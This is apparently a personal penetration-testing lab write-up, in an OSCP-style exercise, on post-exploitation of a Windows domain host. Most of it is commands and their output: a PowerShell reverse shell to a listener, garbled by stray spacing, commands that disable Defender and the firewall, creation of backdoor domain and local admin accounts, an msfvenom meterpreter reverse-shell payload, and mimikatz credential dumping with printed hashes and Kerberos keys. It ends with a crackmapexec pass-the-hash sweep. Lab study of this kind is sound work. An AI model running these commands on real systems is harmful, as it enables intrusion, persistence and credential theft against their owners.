Steps After Obataing a Reverse Shell

Exploitation of Unqouted service path leads to NT/system to Havoc

Then use the following command with nc listener up and running

powershell -nop -W hidden -noni -ep bypass -c “ $TCPCl i e n t = N e w - O bj ec tN e t . S oc k e t s . TCPCl i e n t (^{'} 192.168.49.13 5^{'}, 4446);$ NetworkStream = $TCPCl i e n t . G e tSt re am ();$ StreamWriter = New-Object IO.StreamWriter( $N e tw or k St re am); f u n c t i o nW r i t e T o St re am ($ String) {[byte[]] $scr i pt : B u ff er = 0..$ TCPClient.ReceiveBufferSize | % {0}; $St re amW r i t er . W r i t e ($ String + ‘SHELL> ’); $StreamWriter.Flush()}WriteToStream '';while(($ BytesRead = $N e tw or k St re am . R e a d ($ Buffer, 0, $Buffer.Length)) -gt 0) {$ Command = ([text.encoding]::UTF8).GetString( $B u ff er, 0,$ BytesRead - 1); $Output = try {Invoke-Expression$ Command 2>&1 | Out-String} catch { $_ | Out-String}WriteToStream ($ Output)}$StreamWriter.Close()”

I didn’t like how the shell in Havoc works.

Disable Firewall

Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus

cmd> netsh advfirewall set allprofiles state off cmd> netsh advfirewall set currentprofile state off

Add domain user and put them in Domain Admins group

net user username password /ADD /DOMAIN

net group “Domain Admins” ipsec /ADD /DOMAIN

Add local user and put them local Administrators group

net user ipsec TryHarder.1234 /ADD

net localgroup Administrators ipsec /ADD

Add user to insteresting groups:

net localgroup “Remote Desktop Users” ipsec /add

net localgroup “Debugger users” ipsec /add

net localgroup “Power users” ipsec /add

rdp to that system if you want to

 proxychains xfreerdp /u:ipsec /v:172.16.1.15 /p:TryHarder.1234

It helped me to navigate the systems and check for any interesting files. But no lock in this scenario

Now try to get better reverse shell using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.108 LPORT=4433 -f exe -o reverse.exe

sudo msfconsole -q -x “use multi/handler; set payload windows/x64/meterpreter/reverse_tcp ; set lhost 10.10.16.108; set lport 4433; exploit”

Put the file on the system

I used xfreerdp to put the file and then executed from the shell that I had on nc listener

Get the hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ipsec:1005:aad3b435b51404eeaad3b435b51404ee:235b3c847d4ade90c5f5186cd23803af:::
justalocaladmin:1002:aad3b435b51404eeaad3b435b51404ee:6bf204916120480ba04bc50049e10bdf:::
WDAGUtilityAccount:504::3802cf5095540b577e479ab90ace06cc:::

Going into the shell

shell

powershell

Uploaded the Mimikatz on the system

I used the rdpwindow to upload the file but it is also possible to use meterpreter shell

# escalate security token to SYSTEM integrity
mimikatz pri privilege::debug
mimikatz > token::elevate

SAM creds hash


mimikatz > lsadump::sam    

User : WDAGUtilityAccount
  Hash NTLM: 3802cf5095540b577e479ab90ace06cc

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : e00552de4752e0f4c9ba9dfa0ed30f82

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 25d1cf56d61d5c269dce0dc977c7285408621e428307b9fef510f52c199583da
      aes128_hmac       (4096) : e3316bbf062d3dc989de57a7dbb67957
      des_cbc_md5       (4096) : bcc879b634ad38f4

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : bcc879b634ad38f4

Same results as form the Hash dump function of the meterpreter. :P

Logon passwords hash

mimikatz > sekurlsa::logonpasswords   

         * Username : wsadmin
         * Domain   : CORP
         * NTLM     : 669b12a3bac275251170afbe2c5de8c2
         * SHA1     : 62e3e767c5d2ad6521d8d3e0e672e299437ed666
         * DPAPI    : 41aff401de68a7ae9e94bdb6907dddb2

I got more hashes form the logononpassword commands

Now I can move to cracking the hash. But its not the point. I will conduct more enumeration first. I did changed my mind and tried to crack it using crackstation but no success

Dumping Kerberos Tickets don’t know why (A different approach in oscp theory)

mimikatz # sekurlsa::tickets


Authentication Id : 0 ; 179197 (00000000:0002bbfd)
Session           : Interactive from 1
User Name         : wsadmin
Domain            : CORP
Logon Server      : DC01
Logon Time        : 4/10/2023 4:17:57 PM
SID               : S-1-5-21-2291914956-3290296217-2402366952-1820

Pass the Hash

Knowing that the wsdmin is logged on to the system the idea that comes to the mind is to perform the pth attack if the user has access to other systems on the domain

To check the access across the whole envirnoment we can make use of crackmapexec command

proxychains crackmapexec smb 172.16.1.0/24 -u wsadmin -H 669b12a3bac275251170afbe2c5de8c2 /domain:corp.local

The results shows that this domain user (I get this information from the rpclient command ) has access to almost all the systems but on two different systems it has admin access.(you can see that from the Pwn3d text)

172.16.1.36 (the same system that we are on)
172.168.1.101 (WS02)

Logging into the system with hash

After trying to pass the hash with pth-winexe and xfreerdp I was not able to get the intial foothold on to the WS02 system.

Go the access through crackmapexec

Intial Foothold

Malleum Knowledge Base

Explorer